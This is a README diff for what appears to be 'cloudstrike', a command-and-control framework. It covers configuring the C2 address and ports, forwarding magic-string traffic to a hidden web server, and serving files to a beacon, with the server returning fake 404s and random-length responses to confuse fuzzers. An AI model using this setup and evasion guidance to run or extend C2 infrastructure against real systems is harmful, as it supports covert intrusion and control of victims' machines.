Terraminator/cloudstrike/README.md

 To install the requirements:
 <pre>pip install -r requirements.txt</pre>

 The C2 also has a fallback to the default http.server module instead of flask if you can't install flask and you can also disable it by setting `FLASK`=False in `cloudstrike.py` but this will make the beacon fail to download files from the webserver so you would need to change some lines in main.c.
 Feel free to advance the fallback so the beacon automatically chooses from where to download and contribute the changes!

-You also need to configure the following constants in `cloudstrike.py`
+You also need to configure the following constants in `cloudstrike.py` `C2_ADDR` = "0.0.0.0"
-`C2_ADDR`="0.0.0.0"
+`C2_PORT`= 1337
-`C2_PORT`=1337
+`C2_WEB_PORT`= 1337
-`C2_WEB_PORT`=8001
+`HOME` = "/home/user/cloudstrike/" #needs to end with a '/' !!!

-`HOME`="/home/user/cloudstrike/" #needs to end with a '/' !!!
+Taffic to `C2_PORT` that contains the magic string in the initial request will be forwarded automatically to the web server!

-Taffic to C2_PORT that contains the magic string in the initial request will be forwarded automatically to the web server!
+So you can put the `C2_WEB_PORT` in `cloudtrike.py` behind a firewall and only have to open `C2_PORT` on the c2 server to the internet.

 You can access the web server at `C2_ADDR:C2_WEB_PORT/{magic}/some_file`.
 You can get the current magic string from the cloudstrike command `magic`.
 The flask web server will also respond with a status code of 404 to every request (even if the file is found) and returns a string of random length when no file is found to confuse fuzzers.
 (This also means wget C2_ADDR:C2_WEB_PORT/{magic}/some_file won't work because wget reacts to the 404 status code.
 Instead use curl -O C2_ADDR:C2_WEB_PORT/{magic}/some_file)

 #### Available Functions